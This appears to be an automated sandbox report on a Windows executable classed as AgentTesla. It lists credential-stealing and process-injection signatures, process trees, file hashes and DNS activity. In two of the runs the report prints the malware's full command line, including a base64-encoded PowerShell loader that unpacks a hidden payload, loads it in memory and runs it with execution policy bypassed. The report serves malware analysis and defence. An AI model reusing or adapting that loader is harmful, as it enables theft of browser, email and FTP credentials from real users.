Analysis Overview
SHA256
664b37245df07f80723d2a014fd31e77b3ee06074d1eda962c167aacaa9d9bc3
Threat Level: Known bad
The file fwuvzd.exe was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Checks computer location settings
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-03 11:48
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-03 11:47
Reported
2024-04-03 11:50
Platform
win7-20240221-en
Max time kernel
117s
Max time network
121s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fwuvzd.exe
"C:\Users\Admin\AppData\Local\Temp\fwuvzd.exe"
C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\Admin\start.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\temp.bat" "
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDb252ZXJ0LUFzY2lpVG9TdHJpbmcgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICItdGVtcC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"
Network
Files
C:\Users\Admin\start.vbs
| MD5 | abe1dd23ab4c11aae54f1898c780c0b5 |
| SHA1 | bb2f974b3e0af2baa40920b475582bfd4fb28001 |
| SHA256 | 89054e19532a9a62ca3403a8899495bf6f06557ff886b475a04227eb8aba7b12 |
| SHA512 | e9ec437a32301078ea69ce2f36dadab68315d5e56d94c4d579d3409ccbe0c9e00c3aed7baa0fa6d656fb8ed23213f4c01fb2d108c1a0ed11c58c76cd00f9a99d |
C:\Users\Admin\temp.bat
| MD5 | 58b55cc56434f24c5dfff90a59c34b35 |
| SHA1 | 39583e91e02cd52ef110b9bdab9bd974316db642 |
| SHA256 | 5639b5fd5b7647b3cf2a043984f7ed3f3ceb1471db67d697fa6c3a84c5a33bf9 |
| SHA512 | 8f8a6c44cdf30cbd6a1afed453a0ff1e2487042b2c45832f6aa25469585d097431c91c13598d8bf13f36b03805ebffb665b58ccb0f42859c1c2691fe33dd0be2 |
memory/2588-8-0x00000000744D0000-0x0000000074A7B000-memory.dmp
memory/2588-9-0x00000000744D0000-0x0000000074A7B000-memory.dmp
memory/2588-10-0x0000000002810000-0x0000000002850000-memory.dmp
memory/2588-11-0x0000000002810000-0x0000000002850000-memory.dmp
memory/2588-13-0x00000000744D0000-0x0000000074A7B000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 0db58e9c618a317cca323cfcda030bad |
| SHA1 | f9b78821e914eb5955c78809ed2e95ac27be264d |
| SHA256 | fc59039baf53a8bcd0616ef3f218ff686bd8a860ca4c488489efa3ed79c80c41 |
| SHA512 | b78178d0f52a84be0d4f72a67f0265288242a5c43f6f0847ee1db2696226c76d8b412f3527dc04a28af9262a7ce2be628a6802678f4cf070a70fdc7304fc9992 |
memory/2560-20-0x0000000002840000-0x0000000002880000-memory.dmp
memory/2560-19-0x0000000074490000-0x0000000074A3B000-memory.dmp
C:\Users\Admin\-temp.ps1
| MD5 | c85cd2f6e6462d17628dfbc45bbefc50 |
| SHA1 | bdfe72dcd76c67404719fd653c90600065bd7c95 |
| SHA256 | 09cf28610815212a352b962f37ef96d67e43484d132bd845f9b150ceab8ca190 |
| SHA512 | 564df0161752ed2149f9a5923153d06357544234691876fc61bbc781a6b33a871dbc571dfa0d462e935ef405bb2c1857a7ea17d1fb33ce703d165df2ec342a05 |
memory/2560-22-0x0000000074490000-0x0000000074A3B000-memory.dmp
memory/2560-23-0x0000000074490000-0x0000000074A3B000-memory.dmp
memory/2560-24-0x0000000002840000-0x0000000002880000-memory.dmp
memory/2560-26-0x0000000074490000-0x0000000074A3B000-memory.dmp
memory/2560-27-0x0000000002840000-0x0000000002880000-memory.dmp
memory/2560-28-0x0000000074490000-0x0000000074A3B000-memory.dmp
memory/2560-29-0x0000000074490000-0x0000000074A3B000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-03 11:47
Reported
2024-04-03 11:50
Platform
win10v2004-20240226-en
Max time kernel
148s
Max time network
156s
Command Line
Signatures
AgentTesla
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\wscript.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1956 set thread context of 4108 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fwuvzd.exe
"C:\Users\Admin\AppData\Local\Temp\fwuvzd.exe"
C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\Admin\start.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDb252ZXJ0LUFzY2lpVG9TdHJpbmcgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICItdGVtcC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.66.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\start.vbs
| MD5 | abe1dd23ab4c11aae54f1898c780c0b5 |
| SHA1 | bb2f974b3e0af2baa40920b475582bfd4fb28001 |
| SHA256 | 89054e19532a9a62ca3403a8899495bf6f06557ff886b475a04227eb8aba7b12 |
| SHA512 | e9ec437a32301078ea69ce2f36dadab68315d5e56d94c4d579d3409ccbe0c9e00c3aed7baa0fa6d656fb8ed23213f4c01fb2d108c1a0ed11c58c76cd00f9a99d |
C:\Users\Admin\temp.bat
| MD5 | 58b55cc56434f24c5dfff90a59c34b35 |
| SHA1 | 39583e91e02cd52ef110b9bdab9bd974316db642 |
| SHA256 | 5639b5fd5b7647b3cf2a043984f7ed3f3ceb1471db67d697fa6c3a84c5a33bf9 |
| SHA512 | 8f8a6c44cdf30cbd6a1afed453a0ff1e2487042b2c45832f6aa25469585d097431c91c13598d8bf13f36b03805ebffb665b58ccb0f42859c1c2691fe33dd0be2 |
memory/1840-7-0x00000000751C0000-0x0000000075970000-memory.dmp
memory/1840-6-0x0000000005220000-0x0000000005256000-memory.dmp
memory/1840-8-0x0000000005210000-0x0000000005220000-memory.dmp
memory/1840-9-0x0000000005890000-0x0000000005EB8000-memory.dmp
memory/1840-10-0x00000000057E0000-0x0000000005802000-memory.dmp
memory/1840-11-0x0000000005EC0000-0x0000000005F26000-memory.dmp
memory/1840-12-0x0000000005F30000-0x0000000005F96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_the4n1ne.s1d.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1840-18-0x0000000006030000-0x0000000006384000-memory.dmp
memory/1840-23-0x00000000065F0000-0x000000000660E000-memory.dmp
memory/1840-24-0x0000000006680000-0x00000000066CC000-memory.dmp
memory/1840-25-0x0000000005210000-0x0000000005220000-memory.dmp
memory/1840-26-0x0000000007F20000-0x000000000859A000-memory.dmp
memory/1840-27-0x0000000006B00000-0x0000000006B1A000-memory.dmp
memory/1840-31-0x00000000751C0000-0x0000000075970000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
memory/1956-33-0x00000000751C0000-0x0000000075970000-memory.dmp
memory/1956-34-0x0000000002510000-0x0000000002520000-memory.dmp
memory/1956-35-0x0000000002510000-0x0000000002520000-memory.dmp
memory/1956-45-0x0000000005680000-0x00000000059D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8f53a97ba9a300b341468a765ceecb53 |
| SHA1 | 5c72d2fe43491f8889bd59777f247259137cbcca |
| SHA256 | cb6550fec63c4473e2791c3ad1c1c03f742eedf53af658f04bf4e58afaa3cc8e |
| SHA512 | 1ce8669715cfefcd9152b83016dd35df178c4daf8e1e330892e3188fa2b8434ceb474a8d4496eb03936816361e1fa5b493deead2f032f1801a630fdda678fd09 |
C:\Users\Admin\-temp.ps1
| MD5 | c85cd2f6e6462d17628dfbc45bbefc50 |
| SHA1 | bdfe72dcd76c67404719fd653c90600065bd7c95 |
| SHA256 | 09cf28610815212a352b962f37ef96d67e43484d132bd845f9b150ceab8ca190 |
| SHA512 | 564df0161752ed2149f9a5923153d06357544234691876fc61bbc781a6b33a871dbc571dfa0d462e935ef405bb2c1857a7ea17d1fb33ce703d165df2ec342a05 |
memory/1956-48-0x0000000002510000-0x0000000002520000-memory.dmp
memory/1956-49-0x0000000006E00000-0x0000000006E96000-memory.dmp
memory/1956-50-0x0000000006DD0000-0x0000000006DF2000-memory.dmp
memory/1956-51-0x00000000074E0000-0x0000000007A84000-memory.dmp
memory/1956-53-0x0000000006FB0000-0x0000000007022000-memory.dmp
memory/1956-54-0x0000000000DE0000-0x0000000000DEA000-memory.dmp
memory/1956-55-0x0000000077C21000-0x0000000077D41000-memory.dmp
memory/4108-56-0x0000000000400000-0x0000000000442000-memory.dmp
memory/4108-58-0x00000000751C0000-0x0000000075970000-memory.dmp
memory/4108-59-0x0000000005070000-0x0000000005080000-memory.dmp
memory/1956-60-0x00000000751C0000-0x0000000075970000-memory.dmp
memory/4108-61-0x0000000005F60000-0x0000000005FB0000-memory.dmp
memory/4108-62-0x0000000006050000-0x00000000060E2000-memory.dmp
memory/4108-63-0x0000000006220000-0x000000000622A000-memory.dmp
memory/4108-64-0x00000000751C0000-0x0000000075970000-memory.dmp
memory/4108-65-0x0000000005070000-0x0000000005080000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-03 11:47
Reported
2024-04-03 11:48
Platform
win7-20240221-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-04-03 11:47
Reported
2024-04-03 11:48
Platform
win10v2004-20240226-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-04-03 11:47
Reported
2024-04-03 11:48
Platform
win7-20240221-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-04-03 11:47
Reported
2024-04-03 11:48
Platform
win10v2004-20231215-en